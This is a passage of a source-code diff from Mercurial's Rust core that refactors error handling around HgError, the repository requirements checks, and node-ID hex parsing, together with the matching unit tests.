dirstate_parents( + &self, + ) -> Result<crate::dirstate::DirstateParents, HgError> { + let dirstate = self.hg_vfs().mmap_open("dirstate")?; + let parents = + crate::dirstate::parsers::parse_dirstate_parents(&dirstate)?; + Ok(parents.clone()) + } } impl Vfs<'_> { - pub(crate) fn read( + pub fn join(&self, relative_path: impl AsRef<Path>) -> PathBuf { + self.base.join(relative_path) + } + + pub fn read( &self, relative_path: impl AsRef<Path>, - ) -> std::io::Result<Vec<u8>> { - std::fs::read(self.base.join(relative_path)) + ) -> Result<Vec<u8>, HgError> { + let path = self.join(relative_path); + std::fs::read(&path).when_reading_file(&path) } - pub(crate) fn open( + pub fn mmap_open( &self, relative_path: impl AsRef<Path>, - ) -> std::io::Result<std::fs::File> { - std::fs::File::open(self.base.join(relative_path)) + ) -> Result<Mmap, HgError> { + let path = self.base.join(relative_path); + let file = std::fs::File::open(&path).when_reading_file(&path)?; + // TODO: what are the safety requirements here? + let mmap = unsafe { MmapOptions::new().map(&file) } + .when_reading_file(&path)?; + Ok(mmap) } - pub(crate) fn mmap_open( + pub fn rename( &self, - relative_path: impl AsRef<Path>, - ) -> std::io::Result<Mmap> { - let file = self.open(relative_path)?; - // TODO: what are the safety requirements here? - let mmap = unsafe { MmapOptions::new().map(&file) }?; - Ok(mmap) + relative_from: impl AsRef<Path>, + relative_to: impl AsRef<Path>, + ) -> Result<(), HgError> { + let from = self.join(relative_from); + let to = self.join(relative_to); + std::fs::rename(&from, &to) + .with_context(|| IoErrorContext::RenamingFile { from, to }) } } diff --git a/rust/hg-core/src/requirements.rs b/rust/hg-core/src/requirements.rs --- a/rust/hg-core/src/requirements.rs +++ b/rust/hg-core/src/requirements.rs @@ -1,19 +1,9 @@ -use crate::repo::Repo; -use std::io; +use crate::errors::{HgError, HgResultExt}; +use crate::repo::{Repo, Vfs}; +use crate::utils::join_display; +use std::collections::HashSet; -#[derive(Debug)] -pub enum RequirementsError { - // TODO: include a path? - Io(io::Error), - /// The `requires` file is corrupted - Corrupted, - /// The repository requires a feature that we don't support - Unsupported { - feature: String, - }, -} - -fn parse(bytes: &[u8]) -> Result<Vec<String>, ()> { +fn parse(bytes: &[u8]) -> Result<HashSet<String>, HgError> { // The Python code reading this file uses `str.splitlines` // which looks for a number of line separators (even including a couple of // non-ASCII ones), but Python code writing it always uses `\n`. @@ -27,16 +17,20 @@ if line[0].is_ascii_alphanumeric() && line.is_ascii() { Ok(String::from_utf8(line.into()).unwrap()) } else { - Err(()) + Err(HgError::corrupted("parse error in 'requires' file")) } }) .collect() } -pub fn load(repo: &Repo) -> Result<Vec<String>, RequirementsError> { - match repo.hg_vfs().read("requires") { - Ok(bytes) => parse(&bytes).map_err(|()| RequirementsError::Corrupted), +pub(crate) fn load(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> { + parse(&hg_vfs.read("requires")?) +} +pub(crate) fn load_if_exists(hg_vfs: Vfs) -> Result<HashSet<String>, HgError> { + if let Some(bytes) = hg_vfs.read("requires").io_not_found_as_none()? { + parse(&bytes) + } else { // Treat a missing file the same as an empty file. // From `mercurial/localrepo.py`: // > requires file contains a newline-delimited list of @@ -44,33 +38,121 @@ // > the repository. This file was introduced in Mercurial 0.9.2, // > which means very old repositories may not have one. We assume // > a missing file translates to no requirements. - Err(error) if error.kind() == std::io::ErrorKind::NotFound => { - Ok(Vec::new()) - } - - Err(error) => Err(RequirementsError::Io(error))?, + Ok(HashSet::new()) } } -pub fn check(repo: &Repo) -> Result<(), RequirementsError> { - for feature in load(repo)? { - if !SUPPORTED.contains(&&*feature) { - return Err(RequirementsError::Unsupported { feature }); - } +pub(crate) fn check(repo: &Repo) -> Result<(), HgError> { + let unknown: Vec<_> = repo + .requirements() + .iter() + .map(String::as_str) + // .filter(|feature| !ALL_SUPPORTED.contains(feature.as_str())) + .filter(|feature| { + !REQUIRED.contains(feature) && !SUPPORTED.contains(feature) + }) + .collect(); + if !unknown.is_empty() { + return Err(HgError::unsupported(format!( + "repository requires feature unknown to this Mercurial: {}", + join_display(&unknown, ", ") + ))); + } + let missing: Vec<_> = REQUIRED + .iter() + .filter(|&&feature| !repo.requirements().contains(feature)) + .collect(); + if !missing.is_empty() { + return Err(HgError::unsupported(format!( + "repository is missing feature required by this Mercurial: {}", + join_display(&missing, ", ") + ))); } Ok(()) } -// TODO: set this to actually-supported features +/// rhg does not support repositories that are *missing* any of these features +const REQUIRED: &[&str] = &["revlogv1", "store", "fncache", "dotencode"]; + +/// rhg supports repository with or without these const SUPPORTED: &[&str] = &[ - "dotencode", - "fncache", "generaldelta", - "revlogv1", - "sparserevlog", - "store", + SHARED_REQUIREMENT, + SHARESAFE_REQUIREMENT, + SPARSEREVLOG_REQUIREMENT, + RELATIVE_SHARED_REQUIREMENT, + REVLOG_COMPRESSION_ZSTD, // As of this writing everything rhg does is read-only. // When it starts writing to the repository, it’ll need to either keep the // persistent nodemap up to date or remove this entry: - "persistent-nodemap", + NODEMAP_REQUIREMENT, ]; + +// Copied from mercurial/requirements.py: + +/// When narrowing is finalized and no longer subject to format changes, +/// we should move this to just "narrow" or similar. +#[allow(unused)] +pub(crate) const NARROW_REQUIREMENT: &str = "narrowhg-experimental"; + +/// Enables sparse working directory usage +#[allow(unused)] +pub(crate) const SPARSE_REQUIREMENT: &str = "exp-sparse"; + +/// Enables the internal phase which is used to hide changesets instead +/// of stripping them +#[allow(unused)] +pub(crate) const INTERNAL_PHASE_REQUIREMENT: &str = "internal-phase"; + +/// Stores manifest in Tree structure +#[allow(unused)] +pub(crate) const TREEMANIFEST_REQUIREMENT: &str = "treemanifest"; + +/// Increment the sub-version when the revlog v2 format changes to lock out old +/// clients. +#[allow(unused)] +pub(crate) const REVLOGV2_REQUIREMENT: &str = "exp-revlogv2.1"; + +/// A repository with the sparserevlog feature will have delta chains that +/// can spread over a larger span. Sparse reading cuts these large spans into +/// pieces, so that each piece isn't too big. +/// Without the sparserevlog capability, reading from the repository could use +/// huge amounts of memory, because the whole span would be read at once, +/// including all the intermediate revisions that aren't pertinent for the +/// chain. This is why once a repository has enabled sparse-read, it becomes +/// required. +#[allow(unused)] +pub(crate) const SPARSEREVLOG_REQUIREMENT: &str = "sparserevlog"; + +/// A repository with the sidedataflag requirement will allow to store extra +/// information for revision without altering their original hashes. +#[allow(unused)] +pub(crate) const SIDEDATA_REQUIREMENT: &str = "exp-sidedata-flag"; + +/// A repository with the the copies-sidedata-changeset requirement will store +/// copies related information in changeset's sidedata. +#[allow(unused)] +pub(crate) const COPIESSDC_REQUIREMENT: &str = "exp-copies-sidedata-changeset"; + +/// The repository use persistent nodemap for the changelog and the manifest. +#[allow(unused)] +pub(crate) const NODEMAP_REQUIREMENT: &str = "persistent-nodemap"; + +/// Denotes that the current repository is a share +#[allow(unused)] +pub(crate) const SHARED_REQUIREMENT: &str = "shared"; + +/// Denotes that current repository is a share and the shared source path is +/// relative to the current repository root path +#[allow(unused)] +pub(crate) const RELATIVE_SHARED_REQUIREMENT: &str = "relshared"; + +/// A repository with share implemented safely. The repository has different +/// store and working copy requirements i.e. both `.hg/requires` and +/// `.hg/store/requires` are present. +#[allow(unused)] +pub(crate) const SHARESAFE_REQUIREMENT: &str = "share-safe"; + +/// A repository that use zstd compression inside its revlog +#[allow(unused)] +pub(crate) const REVLOG_COMPRESSION_ZSTD: &str = "revlog-compression-zstd"; diff --git a/rust/hg-core/src/revlog.rs b/rust/hg-core/src/revlog.rs --- a/rust/hg-core/src/revlog.rs +++ b/rust/hg-core/src/revlog.rs @@ -9,7 +9,7 @@ pub mod nodemap; mod nodemap_docket; pub mod path_encode; -pub use node::{Node, NodeError, NodePrefix, NodePrefixRef}; +pub use node::{FromHexError, Node, NodePrefix}; pub mod changelog; pub mod index; pub mod manifest; @@ -35,6 +35,9 @@ #[allow(clippy::unreadable_literal)] pub const WORKING_DIRECTORY_REVISION: Revision = 0x7fffffff; +pub const WORKING_DIRECTORY_HEX: &str = + "ffffffffffffffffffffffffffffffffffffffff"; + /// The simplest expression of what we need of Mercurial DAGs. pub trait Graph { /// Return the two parents of the given `Revision`. diff --git a/rust/hg-core/src/revlog/changelog.rs b/rust/hg-core/src/revlog/changelog.rs --- a/rust/hg-core/src/revlog/changelog.rs +++ b/rust/hg-core/src/revlog/changelog.rs @@ -1,12 +1,13 @@ +use crate::errors::HgError; use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefixRef; use crate::revlog::Revision; +use crate::revlog::{Node, NodePrefix}; /// A specialized `Revlog` to work with `changelog` data format. pub struct Changelog { /// The generic `revlog` format. - revlog: Revlog, + pub(crate) revlog: Revlog, } impl Changelog { @@ -19,7 +20,7 @@ /// Return the `ChangelogEntry` a given node id. pub fn get_node( &self, - node: NodePrefixRef, + node: NodePrefix, ) -> Result<ChangelogEntry, RevlogError> { let rev = self.revlog.get_node_rev(node)?; self.get_rev(rev) @@ -33,6 +34,10 @@ let bytes = self.revlog.get_rev_data(rev)?; Ok(ChangelogEntry { bytes }) } + + pub fn node_from_rev(&self, rev: Revision) -> Option<&Node> { + Some(self.revlog.index.get_entry(rev)?.hash()) + } } /// `Changelog` entry which knows how to interpret the `changelog` data bytes. @@ -53,6 +58,8 @@ /// Return the node id of the `manifest` referenced by this `changelog` /// entry. pub fn manifest_node(&self) -> Result<&[u8], RevlogError> { - self.lines().next().ok_or(RevlogError::Corrupted) + self.lines() + .next() + .ok_or_else(|| HgError::corrupted("empty changelog entry").into()) } } diff --git a/rust/hg-core/src/revlog/index.rs b/rust/hg-core/src/revlog/index.rs --- a/rust/hg-core/src/revlog/index.rs +++ b/rust/hg-core/src/revlog/index.rs @@ -3,6 +3,7 @@ use byteorder::{BigEndian, ByteOrder}; +use crate::errors::HgError; use crate::revlog::node::Node; use crate::revlog::revlog::RevlogError; use crate::revlog::{Revision, NULL_REVISION}; @@ -44,7 +45,8 @@ offsets: Some(offsets), }) } else { - Err(RevlogError::Corrupted) + Err(HgError::corrupted("unexpected inline revlog length") + .into()) } } else { Ok(Self { @@ -298,12 +300,12 @@ // Remaining offset bytes. bytes.extend(&[0u8; 2]); } else { - // Offset is only 6 bytes will usize is 8. - bytes.extend(&self.offset.to_be_bytes()[2..]); + // Offset stored on 48 bits (6 bytes) + bytes.extend(&(self.offset as u64).to_be_bytes()[2..]); } bytes.extend(&[0u8; 2]); // Revision flags. - bytes.extend(&self.compressed_len.to_be_bytes()[4..]); - bytes.extend(&self.uncompressed_len.to_be_bytes()[4..]); + bytes.extend(&(self.compressed_len as u32).to_be_bytes()); + bytes.extend(&(self.uncompressed_len as u32).to_be_bytes()); bytes.extend(&self.base_revision.to_be_bytes()); bytes } diff --git a/rust/hg-core/src/revlog/manifest.rs b/rust/hg-core/src/revlog/manifest.rs --- a/rust/hg-core/src/revlog/manifest.rs +++ b/rust/hg-core/src/revlog/manifest.rs @@ -1,6 +1,6 @@ use crate::repo::Repo; use crate::revlog::revlog::{Revlog, RevlogError}; -use crate::revlog::NodePrefixRef; +use crate::revlog::NodePrefix; use crate::revlog::Revision; use crate::utils::hg_path::HgPath; @@ -20,7 +20,7 @@ /// Return the `ManifestEntry` of a given node id. pub fn get_node( &self, - node: NodePrefixRef, + node: NodePrefix, ) -> Result<ManifestEntry, RevlogError> { let rev = self.revlog.get_node_rev(node)?; self.get_rev(rev) diff --git a/rust/hg-core/src/revlog/node.rs b/rust/hg-core/src/revlog/node.rs --- a/rust/hg-core/src/revlog/node.rs +++ b/rust/hg-core/src/revlog/node.rs @@ -8,8 +8,10 @@ //! In Mercurial code base, it is customary to call "a node" the binary SHA //! of a revision. -use hex::{self, FromHex, FromHexError}; +use crate::errors::HgError; +use bytes_cast::BytesCast; use std::convert::{TryFrom, TryInto}; +use std::fmt; /// The length in bytes of a `Node` /// @@ -29,6 +31,9 @@ /// see also `NODES_BYTES_LENGTH` about it being private. const NODE_NYBBLES_LENGTH: usize = 2 * NODE_BYTES_LENGTH; +/// Default for UI presentation +const SHORT_PREFIX_DEFAULT_NYBBLES_LENGTH: u8 = 12; + /// Private alias for readability and to ease future change type NodeData = [u8; NODE_BYTES_LENGTH]; @@ -45,11 +50,10 @@ /// if they need a loop boundary. /// /// All methods that create a `Node` either take a type that enforces -/// the size or fail immediately at runtime with [`ExactLengthRequired`]. +/// the size or return an error at runtime. /// /// [`nybbles_len`]: #method.nybbles_len -/// [`ExactLengthRequired`]: struct.NodeError#variant.ExactLengthRequired -#[derive(Clone, Debug, PartialEq)] +#[derive(Copy, Clone, Debug, PartialEq, BytesCast, derive_more::From)] #[repr(transparent)] pub struct Node { data: NodeData, @@ -60,32 +64,49 @@ data: [0; NODE_BYTES_LENGTH], }; -impl From<NodeData> for Node { - fn from(data: NodeData) -> Node { - Node { data } +/// Return an error if the slice has an unexpected length +impl<'a> TryFrom<&'a [u8]> for &'a Node { + type Error = (); + + #[inline] + fn try_from(bytes: &'a [u8]) -> Result<Self, Self::Error> { + match Node::from_bytes(bytes) { + Ok((node, rest)) if rest.is_empty() => Ok(node), + _ => Err(()), + } } } /// Return an error if the slice has an unexpected length -impl<'a> TryFrom<&'a [u8]> for &'a Node { +impl TryFrom<&'_ [u8]> for Node { type Error = std::array::TryFromSliceError; #[inline] - fn try_from(bytes: &'a [u8]) -> Result<&'a Node, Self::Error> { + fn try_from(bytes: &'_ [u8]) -> Result<Self, Self::Error> { let data = bytes.try_into()?; - // Safety: `#[repr(transparent)]` makes it ok to "wrap" the target - // of a reference to the type of the single field. - Ok(unsafe { std::mem::transmute::<&NodeData, &Node>(data) }) + Ok(Self { data }) } } -#[derive(Debug, PartialEq)] -pub enum NodeError { - ExactLengthRequired(usize, String), - PrefixTooLong(String), - HexError(FromHexError, String), +impl From<&'_ NodeData> for Node { + #[inline] + fn from(data: &'_ NodeData) -> Self { + Self { data: *data } + } } +impl fmt::LowerHex for Node { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + for &byte in &self.data { + write!(f, "{:02x}", byte)? + } + Ok(()) + } +} + +#[derive(Debug)] +pub struct FromHexError; + /// Low level utility function, also for prefixes fn get_nybble(s: &[u8], i: usize) -> u8 { if i % 2 == 0 { @@ -117,18 +138,26 @@ /// /// To be used in FFI and I/O only, in order to facilitate future /// changes of hash format. - pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, NodeError> { - Ok(NodeData::from_hex(hex.as_ref()) - .map_err(|e| NodeError::from((e, hex)))? - .into()) + pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Node, FromHexError> { + let prefix = NodePrefix::from_hex(hex)?; + if prefix.nybbles_len() == NODE_NYBBLES_LENGTH { + Ok(Self { data: prefix.data }) + } else { + Err(FromHexError) + } } - /// Convert to hexadecimal string representation + /// `from_hex`, but for input from an internal file of the repository such + /// as a changelog or manifest entry. /// - /// To be used in FFI and I/O only, in order to facilitate future - /// changes of hash format. - pub fn encode_hex(&self) -> String { - hex::encode(self.data) + /// An error is treated as repository corruption. + pub fn from_hex_for_repo(hex: impl AsRef<[u8]>) -> Result<Node, HgError> { + Self::from_hex(hex.as_ref()).map_err(|FromHexError| { + HgError::CorruptedRepository(format!( + "Expected a full hexadecimal node ID, found {}", + String::from_utf8_lossy(hex.as_ref()) + )) + }) } /// Provide access to binary data @@ -138,17 +167,11 @@ pub fn as_bytes(&self) -> &[u8] { &self.data } -} -impl<T: AsRef<[u8]>> From<(FromHexError, T)> for NodeError { - fn from(err_offender: (FromHexError, T)) -> Self { - let (err, offender) = err_offender; - let offender = String::from_utf8_lossy(offender.as_ref()).into_owned(); - match err { - FromHexError::InvalidStringLength => { - NodeError::ExactLengthRequired(NODE_NYBBLES_LENGTH, offender) - } - _ => NodeError::HexError(err, offender), + pub fn short(&self) -> NodePrefix { + NodePrefix { + nybbles_len: SHORT_PREFIX_DEFAULT_NYBBLES_LENGTH, + data: self.data, } } } @@ -158,10 +181,14 @@ /// Since it can potentially come from an hexadecimal representation with /// odd length, it needs to carry around whether the last 4 bits are relevant /// or not. -#[derive(Debug, PartialEq)] +#[derive(Debug, PartialEq, Copy, Clone)] pub struct NodePrefix { - buf: Vec<u8>, - is_odd: bool, + /// In `1..=NODE_NYBBLES_LENGTH` + nybbles_len: u8, + /// The first `4 * length_in_nybbles` bits are used (considering bits + /// within a bytes in big-endian: most significant first), the rest + /// are zero. + data: NodeData, } impl NodePrefix { @@ -172,72 +199,42 @@ /// /// To be used in FFI and I/O only, in order to facilitate future /// changes of hash format. - pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, NodeError> { + pub fn from_hex(hex: impl AsRef<[u8]>) -> Result<Self, FromHexError> { let hex = hex.as_ref(); let len = hex.len(); - if len > NODE_NYBBLES_LENGTH { - return Err(NodeError::PrefixTooLong( - String::from_utf8_lossy(hex).to_owned().to_string(), - )); + if len > NODE_NYBBLES_LENGTH || len == 0 { + return Err(FromHexError); } - let is_odd = len % 2 == 1; - let even_part = if is_odd { &hex[..len - 1] } else { hex }; - let mut buf: Vec<u8> = - Vec::from_hex(&even_part).map_err(|e| (e, hex))?; - - if is_odd { - let latest_char = char::from(hex[len - 1]); - let latest_nybble = latest_char.to_digit(16).ok_or_else(|| { - ( - FromHexError::InvalidHexCharacter { - c: latest_char, - index: len - 1, - }, - hex, - ) - })? as u8; - buf.push(latest_nybble << 4); + let mut data = [0; NODE_BYTES_LENGTH]; + let mut nybbles_len = 0; + for &ascii_byte in hex { + let nybble = match char::from(ascii_byte).to_digit(16) { + Some(digit) => digit as u8, + None => return Err(FromHexError), + }; + // Fill in the upper half of a byte first, then the lower half. + let shift = if nybbles_len % 2 == 0 { 4 } else { 0 }; + data[nybbles_len as usize / 2] |= nybble << shift; + nybbles_len += 1; } - Ok(NodePrefix { buf, is_odd }) + Ok(Self { data, nybbles_len }) } - pub fn borrow(&self) -> NodePrefixRef { - NodePrefixRef { - buf: &self.buf, - is_odd: self.is_odd, - } - } -} - -#[derive(Clone, Debug, PartialEq)] -pub struct NodePrefixRef<'a> { - buf: &'a [u8], - is_odd: bool, -} - -impl<'a> NodePrefixRef<'a> { - pub fn len(&self) -> usize { - if self.is_odd { - self.buf.len() * 2 - 1 - } else { - self.buf.len() * 2 - } - } - - pub fn is_empty(&self) -> bool { - self.len() == 0 + pub fn nybbles_len(&self) -> usize { + self.nybbles_len as _ } pub fn is_prefix_of(&self, node: &Node) -> bool { - if self.is_odd { - let buf = self.buf; - let last_pos = buf.len() - 1; - node.data.starts_with(buf.split_at(last_pos).0) - && node.data[last_pos] >> 4 == buf[last_pos] >> 4 - } else { - node.data.starts_with(self.buf) + let full_bytes = self.nybbles_len() / 2; + if self.data[..full_bytes] != node.data[..full_bytes] { + return false; } + if self.nybbles_len() % 2 == 0 { + return true; + } + let last = self.nybbles_len() - 1; + self.get_nybble(last) == node.get_nybble(last) } /// Retrieve the `i`th half-byte from the prefix. @@ -245,8 +242,12 @@ /// This is also the `i`th hexadecimal digit in numeric form, /// also called a [nybble](https://en.wikipedia.org/wiki/Nibble). pub fn get_nybble(&self, i: usize) -> u8 { - assert!(i < self.len()); - get_nybble(self.buf, i) + assert!(i < self.nybbles_len()); + get_nybble(&self.data, i) + } + + fn iter_nybbles(&self) -> impl Iterator<Item = u8> + '_ { + (0..self.nybbles_len()).map(move |i| get_nybble(&self.data, i)) } /// Return the index first nybble that's different from `node` @@ -257,42 +258,49 @@ /// /// Returned index is as in `get_nybble`, i.e., starting at 0. pub fn first_different_nybble(&self, node: &Node) -> Option<usize> { - let buf = self.buf; - let until = if self.is_odd { - buf.len() - 1 - } else { - buf.len() - }; - for (i, item) in buf.iter().enumerate().take(until) { - if *item != node.data[i] { - return if *item & 0xf0 == node.data[i] & 0xf0 { - Some(2 * i + 1) - } else { - Some(2 * i) - }; - } + self.iter_nybbles() + .zip(NodePrefix::from(*node).iter_nybbles()) + .position(|(a, b)| a != b) + } +} + +impl fmt::LowerHex for NodePrefix { + fn fmt(&self, f: &mut fmt::Formatter) -> fmt::Result { + let full_bytes = self.nybbles_len() / 2; + for &byte in &self.data[..full_bytes] { + write!(f, "{:02x}", byte)? } - if self.is_odd && buf[until] & 0xf0 != node.data[until] & 0xf0 { - Some(until * 2) - } else { - None + if self.nybbles_len() % 2 == 1 { + let last = self.nybbles_len() - 1; + write!(f, "{:x}", self.get_nybble(last))? + } + Ok(()) + } +} + +/// A shortcut for full `Node` references +impl From<&'_ Node> for NodePrefix { + fn from(node: &'_ Node) -> Self { + NodePrefix { + nybbles_len: node.nybbles_len() as _, + data: node.data, } } } /// A shortcut for full `Node` references -impl<'a> From<&'a Node> for NodePrefixRef<'a> { - fn from(node: &'a Node) -> Self { - NodePrefixRef { - buf: &node.data, - is_odd: false, +impl From<Node> for NodePrefix { + fn from(node: Node) -> Self { + NodePrefix { + nybbles_len: node.nybbles_len() as _, + data: node.data, } } } -impl PartialEq<Node> for NodePrefixRef<'_> { +impl PartialEq<Node> for NodePrefix { fn eq(&self, other: &Node) -> bool { - !self.is_odd && self.buf == other.data + Self::from(*other) == *self } } @@ -300,18 +308,16 @@ mod tests { use super::*; - fn sample_node() -> Node { - let mut data = [0; NODE_BYTES_LENGTH]; - data.copy_from_slice(&[ + const SAMPLE_NODE_HEX: &str = "0123456789abcdeffedcba9876543210deadbeef"; + const SAMPLE_NODE: Node = Node { + data: [ 0x01, 0x23, 0x45, 0x67, 0x89, 0xab, 0xcd, 0xef, 0xfe, 0xdc, 0xba, 0x98, 0x76, 0x54, 0x32, 0x10, 0xde, 0xad, 0xbe, 0xef, - ]); - data.into() - } + ], + }; /// Pad an hexadecimal string to reach `NODE_NYBBLES_LENGTH` - ///check_hash - /// The padding is made with zeros + /// The padding is made with zeros. pub fn hex_pad_right(hex: &str) -> String { let mut res = hex.to_string(); while res.len() < NODE_NYBBLES_LENGTH { @@ -320,135 +326,88 @@ res } - fn sample_node_hex() -> String { - hex_pad_right("0123456789abcdeffedcba9876543210deadbeef") - } - #[test] fn test_node_from_hex() { - assert_eq!(Node::from_hex(&sample_node_hex()), Ok(sample_node())); - - let mut short = hex_pad_right("0123"); - short.pop(); - short.pop(); - assert_eq!( - Node::from_hex(&short), - Err(NodeError::ExactLengthRequired(NODE_NYBBLES_LENGTH, short)), - ); - - let not_hex = hex_pad_right("012... oops"); - assert_eq!( - Node::from_hex(¬_hex), - Err(NodeError::HexError( - FromHexError::InvalidHexCharacter { c: '.', index: 3 }, - not_hex, - )), - ); + let not_hex = "012... oops"; + let too_short = "0123"; + let too_long = format!("{}0", SAMPLE_NODE_HEX); + assert_eq!(Node::from_hex(SAMPLE_NODE_HEX).unwrap(), SAMPLE_NODE); + assert!(Node::from_hex(not_hex).is_err()); + assert!(Node::from_hex(too_short).is_err()); + assert!(Node::from_hex(&too_long).is_err()); } #[test] fn test_node_encode_hex() { - assert_eq!(sample_node().encode_hex(), sample_node_hex()); + assert_eq!(format!("{:x}", SAMPLE_NODE), SAMPLE_NODE_HEX); } #[test] - fn test_prefix_from_hex() -> Result<(), NodeError> { - assert_eq!( - NodePrefix::from_hex("0e1")?, - NodePrefix { - buf: vec![14, 16], - is_odd: true - } - ); + fn test_prefix_from_to_hex() -> Result<(), FromHexError> { + assert_eq!(format!("{:x}", NodePrefix::from_hex("0e1")?), "0e1"); + assert_eq!(format!("{:x}", NodePrefix::from_hex("0e1a")?), "0e1a"); assert_eq!( - NodePrefix::from_hex("0e1a")?, - NodePrefix { - buf: vec![14, 26], - is_odd: false - } + format!("{:x}", NodePrefix::from_hex(SAMPLE_NODE_HEX)?), + SAMPLE_NODE_HEX ); - - // checking limit case - let node_as_vec = sample_node().data.iter().cloned().collect(); - assert_eq!( - NodePrefix::from_hex(sample_node_hex())?, - NodePrefix { - buf: node_as_vec, - is_odd: false - } - ); - Ok(()) } #[test] fn test_prefix_from_hex_errors() { - assert_eq!( - NodePrefix::from_hex("testgr"), - Err(NodeError::HexError( - FromHexError::InvalidHexCharacter { c: 't', index: 0 }, - "testgr".to_string() - )) - ); - let mut long = NULL_NODE.encode_hex(); + assert!(NodePrefix::from_hex("testgr").is_err()); + let mut long = format!("{:x}", NULL_NODE); long.push('c'); - match NodePrefix::from_hex(&long) - .expect_err("should be refused as too long") - { - NodeError::PrefixTooLong(s) => assert_eq!(s, long), - err => panic!(format!("Should have been TooLong, got {:?}", err)), - } + assert!(NodePrefix::from_hex(&long).is_err()) } #[test] - fn test_is_prefix_of() -> Result<(), NodeError> { + fn test_is_prefix_of() -> Result<(), FromHexError> { let mut node_data = [0; NODE_BYTES_LENGTH]; node_data[0] = 0x12; node_data[1] = 0xca; let node = Node::from(node_data); - assert!(NodePrefix::from_hex("12")?.borrow().is_prefix_of(&node)); - assert!(!NodePrefix::from_hex("1a")?.borrow().is_prefix_of(&node)); - assert!(NodePrefix::from_hex("12c")?.borrow().is_prefix_of(&node)); - assert!(!NodePrefix::from_hex("12d")?.borrow().is_prefix_of(&node)); + assert!(NodePrefix::from_hex("12")?.is_prefix_of(&node)); + assert!(!NodePrefix::from_hex("1a")?.is_prefix_of(&node)); + assert!(NodePrefix::from_hex("12c")?.is_prefix_of(&node)); + assert!(!NodePrefix::from_hex("12d")?.is_prefix_of(&node)); Ok(()) } #[test] - fn test_get_nybble() -> Result<(), NodeError> { + fn test_get_nybble() -> Result<(), FromHexError> { let prefix = NodePrefix::from_hex("dead6789cafe")?; - assert_eq!(prefix.borrow().get_nybble(0), 13); - assert_eq!(prefix.borrow().get_nybble(7), 9); + assert_eq!(prefix.get_nybble(0), 13); + assert_eq!(prefix.get_nybble(7), 9); Ok(()) } #[test] fn test_first_different_nybble_even_prefix() { let prefix = NodePrefix::from_hex("12ca").unwrap(); - let prefref = prefix.borrow(); let mut node = Node::from([0; NODE_BYTES_LENGTH]); - assert_eq!(prefref.first_different_nybble(&node), Some(0)); + assert_eq!(prefix.first_different_nybble(&node), Some(0)); node.data[0] = 0x13; - assert_eq!(prefref.first_different_nybble(&node), Some(1)); + assert_eq!(prefix.first_different_nybble(&node), Some(1)); node.data[0] = 0x12; - assert_eq!(prefref.first_different_nybble(&node), Some(2)); + assert_eq!(prefix.first_different_nybble(&node), Some(2)); node.data[1] = 0xca; // now it is a prefix - assert_eq!(prefref.first_different_nybble(&node), None); + assert_eq!(prefix.first_different_nybble(&node), None); } #[test] fn test_first_different_nybble_odd_prefix() { let prefix = NodePrefix::from_hex("12c").unwrap(); - let prefref = prefix.borrow(); let mut node = Node::from([0; NODE_BYTES_LENGTH]); - assert_eq!(prefref.first_different_nybble(&node), Some(0)); + assert_eq!(prefix.first_different_nybble(&node), Some(0)); node.data[0] = 0x13; - assert_eq!(prefref.first_different_nybble(&node), Some(1)); + assert_eq!(prefix.first_different_nybble(&node), Some(1)); node.data[0] = 0x12; - assert_eq!(prefref.first_different_nybble(&node), Some(2)); + assert_eq!(prefix.first_different_nybble(&node), Some(2)); node.data[1] = 0xca; // now it is a prefix - assert_eq!(prefref.first_different_nybble(&node), None); + assert_eq!(prefix.first_different_nybble(&node), None); } } diff --git a/rust/hg-core/src/revlog/nodemap.rs b/rust/hg-core/src/revlog/nodemap.rs --- a/rust/hg-core/src/revlog/nodemap.rs +++ b/rust/hg-core/src/revlog/nodemap.rs @@ -13,31 +13,23 @@ //! is used in a more abstract context. use super::{ - node::NULL_NODE, Node, NodeError, NodePrefix, NodePrefixRef, Revision, - RevlogIndex, NULL_REVISION, + node::NULL_NODE, Node, NodePrefix, Revision, RevlogIndex, NULL_REVISION, }; +use bytes_cast::{unaligned, BytesCast}; use std::cmp::max; use std::fmt; -use std::mem; +use std::mem::{self, align_of, size_of}; use std::ops::Deref; use std::ops::Index; -use std::slice; #[derive(Debug, PartialEq)] pub enum NodeMapError { MultipleResults, - InvalidNodePrefix(NodeError), /// A `Revision` stored in the nodemap could not be found in the index RevisionNotInIndex(Revision), } -impl From<NodeError> for NodeMapError { - fn from(err: NodeError) -> Self { - NodeMapError::InvalidNodePrefix(err) - } -} - /// Mapping system from Mercurial nodes to revision numbers. /// /// ## `RevlogIndex` and `NodeMap` @@ -82,24 +74,9 @@ fn find_bin<'a>( &self, idx: &impl RevlogIndex, - prefix: NodePrefixRef<'a>, + prefix: NodePrefix, ) -> Result<Option<Revision>, NodeMapError>; - /// Find the unique Revision whose `Node` hexadecimal string representation - /// starts with a given prefix - /// - /// If no Revision matches the given prefix, `Ok(None)` is returned. - /// - /// If several Revisions match the given prefix, a [`MultipleResults`] - /// error is returned. - fn find_hex( - &self, - idx: &impl RevlogIndex, - prefix: &str, - ) -> Result<Option<Revision>, NodeMapError> { - self.find_bin(idx, NodePrefix::from_hex(prefix)?.borrow()) - } - /// Give the size of the shortest node prefix that determines /// the revision uniquely. /// @@ -114,19 +91,9 @@ fn unique_prefix_len_bin<'a>( &self, idx: &impl RevlogIndex, - node_prefix: NodePrefixRef<'a>, + node_prefix: NodePrefix, ) -> Result<Option<usize>, NodeMapError>; - /// Same as `unique_prefix_len_bin`, with the hexadecimal representation - /// of the prefix as input. - fn unique_prefix_len_hex( - &self, - idx: &impl RevlogIndex, - prefix: &str, - ) -> Result<Option<usize>, NodeMapError> { - self.unique_prefix_len_bin(idx, NodePrefix::from_hex(prefix)?.borrow()) - } - /// Same as `unique_prefix_len_bin`, with a full `Node` as input fn unique_prefix_len_node( &self, @@ -149,7 +116,7 @@ /// Low level NodeTree [`Blocks`] elements /// /// These are exactly as for instance on persistent storage. -type RawElement = i32; +type RawElement = unaligned::I32Be; /// High level representation of values in NodeTree /// [`Blocks`](struct.Block.html) @@ -168,23 +135,24 @@ /// /// See [`Block`](struct.Block.html) for explanation about the encoding. fn from(raw: RawElement) -> Element { - if raw >= 0 { - Element::Block(raw as usize) - } else if raw == -1 { + let int = raw.get(); + if int >= 0 